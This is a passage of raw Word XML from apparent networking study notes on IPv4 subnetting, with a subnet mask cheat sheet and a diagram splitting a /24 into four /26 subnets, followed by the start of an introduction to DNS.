          <w:p w14:paraId="641EE228" w14:textId="1AF78034" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>/</w:t>
            </w:r>
            <w:r>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="565" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0FD70D93" w14:textId="5FD0C2DD" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="0074642F">
              <w:t>255.</w:t>
            </w:r>
            <w:r>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0074642F">
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="0074642F">
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1213" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="16EA1260" w14:textId="0FFCE8F4" w:rsidR="00151156" w:rsidRPr="00E86F37" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E86F37">
              <w:t>16,777,21</w:t>
            </w:r>
            <w:r>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1300" w:type="pct"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4830693D" w14:textId="28F9EC46" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00E86F37">
              <w:t>16,777,214</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1679" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="25859288" w14:textId="77777777" w:rsidR="00151156" w:rsidRPr="0074642F" w:rsidRDefault="00151156" w:rsidP="00151156">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="028B1B56" w14:textId="092DB061" w:rsidR="0074642F" w:rsidRDefault="0074642F" w:rsidP="0074642F">
      <w:r w:rsidRPr="0074642F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED21D7">
        <w:t>Bigger</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED21D7">
        <w:t>CIDR</w:t>
      </w:r>
      <w:r w:rsidRPr="0074642F">
        <w:t xml:space="preserve"> = smaller subnet = fewer hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75357704" w14:textId="6CD2F838" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="00970A81" w:rsidP="00970A81">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">IPv4 </w:t>
      </w:r>
      <w:r w:rsidR="007F5C98" w:rsidRPr="007F5C98">
        <w:t>Subnetting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F23BA35" w14:textId="77777777" w:rsidR="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="00970A81">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="007F5C98">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6765EA" w14:textId="08B55CF2" w:rsidR="00151156" w:rsidRDefault="00151156" w:rsidP="00151156">
      <w:r w:rsidRPr="00151156">
        <w:t>Subnetting works by "borrowing" bits from the host portion to create more</w:t>
      </w:r>
      <w:r w:rsidR="0094148F">
        <w:t xml:space="preserve"> subnets</w:t>
      </w:r>
      <w:r w:rsidR="003A359C">
        <w:t xml:space="preserve"> (sub networks)</w:t>
      </w:r>
      <w:r w:rsidR="0094148F">
        <w:t xml:space="preserve"> in a</w:t>
      </w:r>
      <w:r w:rsidRPr="00151156">
        <w:t xml:space="preserve"> network</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F69DBF" w14:textId="5F4AE84D" w:rsidR="00174988" w:rsidRDefault="00174988" w:rsidP="00151156">
      <w:r w:rsidRPr="009D1C68">
        <w:t>OSI Layer: Network (Layer 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3C491F" w14:textId="77777777" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="00970A81">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="007F5C98">
        <w:t>How It Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F42B02" w14:textId="0AFE4713" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="007F5C98">
      <w:r w:rsidRPr="00970A81">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="007F5C98">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C22A14C" w14:textId="77777777" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="0094148F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007F5C98">
        <w:t>Start with base network: Original network with default mask (e.g., 192.168.1.0/24)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0792DBF3" w14:textId="77777777" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="0094148F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007F5C98">
        <w:t>Determine requirements: Calculate number of subnets and hosts needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280C9CB8" w14:textId="77777777" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="0094148F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007F5C98">
        <w:t>Borrow host bits: Convert host bits to subnet bits as needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E51577" w14:textId="77777777" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="0094148F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007F5C98">
        <w:t>Create new mask: Extended mask defines new network boundaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7528CF" w14:textId="77777777" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="007F5C98" w:rsidP="0094148F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="93"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r w:rsidRPr="007F5C98">
        <w:t>Calculate ranges: Each subnet gets its own address range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32AB57FB" w14:textId="14204446" w:rsidR="007F5C98" w:rsidRPr="007F5C98" w:rsidRDefault="0094148F" w:rsidP="007F5C98">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example</w:t>
      </w:r>
      <w:r w:rsidR="007F5C98" w:rsidRPr="007F5C98">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7"/>
        <w:gridCol w:w="1039"/>
      </w:tblGrid>
      <w:tr w:rsidR="0094148F" w14:paraId="30232E7F" w14:textId="77777777" w:rsidTr="00F51449">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="16457" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34DD64BF" w14:textId="551B0E49" w:rsidR="0094148F" w:rsidRDefault="0094148F" w:rsidP="0074642F">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41E33120" wp14:editId="0C73E4BE">
                  <wp:extent cx="10972800" cy="2661920"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="632351933"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0" cy="2661920"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1039" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18217705" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>@startuml Basic_Subnetting_Example</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56DFA659" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>title Basic Subnetting: 192.168.1.0/24 into 4 Subnets</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CFD92A0" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>package "Original Network: 192.168.1.0/24" { rectangle "256 addresses (254 usable)" as original #lightblue }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06EEEC5B" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>package "After Subnetting (/26)" { rectangle "Subnet 1\n192.168.1.0/26" as sub1 #lightgreen rectangle "Subnet 2\n192.168.1.64/26" as sub2 #lightgreen</w:t>
            </w:r>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:br/>
              <w:t>rectangle "Subnet 3\n192.168.1.128/26" as sub3 #lightgreen rectangle "Subnet 4\n192.168.1.192/26" as sub4 #lightgreen }</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16EE0593" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>original --&gt; sub1 : Borrowed 2 bits original --&gt; sub2 : 2^2 = 4 subnets original --&gt; sub3 : 2^6 = 64 addresses each original --&gt; sub4 : 64 - 2 = 62 usable hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="445899D1" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>note right of sub1 : Network: .0\nBroadcast: .63\nHosts: .1-.62\n62 usable hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1611B05C" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>note right of sub2 : Network: .64\nBroadcast: .127\nHosts: .65-.126\n62 usable hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FA76D33" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>note right of sub3 : Network: .128\nBroadcast: .191\nHosts: .129-.190\n62 usable hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="151504B6" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>note right of sub4 : Network: .192\nBroadcast: .255\nHosts: .193-.254\n62 usable hosts</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="62628305" w14:textId="77777777" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0094148F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>note bottom : Subnet Mask changed from /24 (255.255.255.0) to /26 (255.255.255.192)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C6EC25D" w14:textId="7BB79D2F" w:rsidR="0094148F" w:rsidRPr="0094148F" w:rsidRDefault="0094148F" w:rsidP="0074642F">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0094148F">
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
              <w:t>@enduml</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4C867F10" w14:textId="7A7BCC9F" w:rsidR="00F51449" w:rsidRDefault="00F51449" w:rsidP="00970A81">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Subnet Mask Cheat Sheet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58434E2A" w14:textId="074E02D2" w:rsidR="00F51449" w:rsidRPr="00E37AB1" w:rsidRDefault="00F51449" w:rsidP="00F51449">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/24 = 255.255.255.0   → 1 network,  254 hosts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291A8AFC" w14:textId="77777777" w:rsidR="00F51449" w:rsidRPr="00E37AB1" w:rsidRDefault="00F51449" w:rsidP="00F51449">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/25 = 255.255.255.128 → 2 networks, 126 hosts each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A52A455" w14:textId="77777777" w:rsidR="00F51449" w:rsidRPr="00E37AB1" w:rsidRDefault="00F51449" w:rsidP="00F51449">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/26 = 255.255.255.192 → 4 networks, 62 hosts each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F775953" w14:textId="77777777" w:rsidR="00F51449" w:rsidRPr="00E37AB1" w:rsidRDefault="00F51449" w:rsidP="00F51449">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/27 = 255.255.255.224 → 8 networks, 30 hosts each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA9627" w14:textId="77777777" w:rsidR="00F51449" w:rsidRPr="00E37AB1" w:rsidRDefault="00F51449" w:rsidP="00F51449">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/28 = 255.255.255.240 → 16 networks, 14 hosts each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B4F1735" w14:textId="77777777" w:rsidR="00F51449" w:rsidRPr="00E37AB1" w:rsidRDefault="00F51449" w:rsidP="00F51449">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/29 = 255.255.255.248 → 32 networks, 6 hosts each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B13A209" w14:textId="12C5E552" w:rsidR="0074642F" w:rsidRPr="00E37AB1" w:rsidRDefault="00F51449" w:rsidP="00F51449">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E37AB1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>/30 = 255.255.255.252 → 64 networks, 2 hosts each</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453244B2" w14:textId="77777777" w:rsidR="00F51449" w:rsidRDefault="00F51449" w:rsidP="00F51449"/>
    <w:p w14:paraId="28F8ED8C" w14:textId="77777777" w:rsidR="00224B1D" w:rsidRDefault="00224B1D">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D4A94" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="004D55CA" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="002A358C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Domain Name System </w:t>
      </w:r>
      <w:r>
        <w:t>(DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3802C5CA" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r w:rsidRPr="00456114">
        <w:t>Introduction to DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D6AAECC" w14:textId="77777777" w:rsidR="00A60755" w:rsidRPr="00456114" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00456114">
        <w:t>Definition</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C0AED6" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:r w:rsidRPr="00456114">
        <w:t>Domain Name System</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>DNS</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t xml:space="preserve"> is a hierarchical, distributed </w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>naming system</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t xml:space="preserve"> that translates human-readable domain names (like </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00456114">
          <w:rPr>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:rPr>
          <w:t>www.example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00456114">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t xml:space="preserve"> into machine-readable IP addresses (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
        </w:rPr>
        <w:t>192.0.2.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t xml:space="preserve">). DNS serves as the "phonebook of the </w:t>
      </w:r>
      <w:r>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidRPr="00456114">
        <w:t>nternet," enabling users to access websites and services using memorable names instead of numerical IP addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="433DFFA8" w14:textId="0B047F09" w:rsidR="00CD1C35" w:rsidRDefault="00CD1C35" w:rsidP="00A60755">
      <w:r w:rsidRPr="001355DD">
        <w:t xml:space="preserve">OSI Layer: </w:t>
      </w:r>
      <w:r>
        <w:t>Application</w:t>
      </w:r>
      <w:r w:rsidRPr="001355DD">
        <w:t xml:space="preserve"> (Layer </w:t>
      </w:r>
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="001355DD">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0022B4" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Components</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4040DD" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS Clients (Resolvers) — ask the questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F052039" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="265"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS Servers — provide the answers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B1FE8E" w14:textId="77777777" w:rsidR="00A60755" w:rsidRDefault="00A60755" w:rsidP="00A60755">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
